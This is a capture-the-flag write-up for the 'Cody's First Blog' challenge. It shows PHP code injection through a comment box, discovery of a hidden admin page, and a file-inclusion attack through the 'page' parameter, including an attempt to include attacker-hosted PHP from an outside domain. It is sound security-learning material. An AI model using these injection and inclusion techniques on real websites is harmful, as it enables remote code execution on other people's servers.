Hacker1 CTF - Cody's First Blog

Who would dare write their own blog software? Oh wait...

What a train wreck

This challenge has 3 flags, and I've managed to get 2 of them so far:

Flag 0

The "blog post" indicates that the site is powered by php. So what happens if we just include some php in the comment input box?

<?php echo '<p>Hello World</p>'; ?> 

First flag!

Flag 1

Looking at the page source shows a commented out anchor:

    <h3>Comments</h3>
    <!--<a href="?page=admin.auth.inc">Admin login</a>-->

Loading that path brings up an admin log in page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!

Flag 2

What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file maybe we could host it ourselves and inject some code for the target to execute.

Notice: Undefined variable: title in /app/index.php on line 30

Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21

Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21

Ok, so I think this server cannot reach outside of it's own network for including files via php (not to mention the fact it says so in the one "post")

"This server can't talk to the outside world and nobody but me can upload files, so there's no risk in just using include()."

So is there anything we can include from within the network?

http://{ctf}/?page=http://127.0.0.1/admin.inc

Notice: Undefined variable: title in /app/index.php on line 30
Pending Comments

Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /app/admin.inc.php on line 5

Warning: mysql_query(): A link to the server could not be established in /app/admin.inc.php on line 5

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /app/admin.inc.php on line 6

Not sure what it's worth, but we know that mysql is involved and that we can include local files, but we'll need to spend some more time figuring out what to include. Ideally it would be content under our control, so maybe we can post a comment and somehow include it.

Update 04/28/2019 Ok, combining what we've learned about flags 0 and 1, we can write some php code as a comment, approve it as admin, and now we need to execute it:

http://{ctf}/?page=http://127.0.0.1/index will execute the php we've written and approved in the comments! But what does this challenge want us to do with that?

BINGO All flags captured!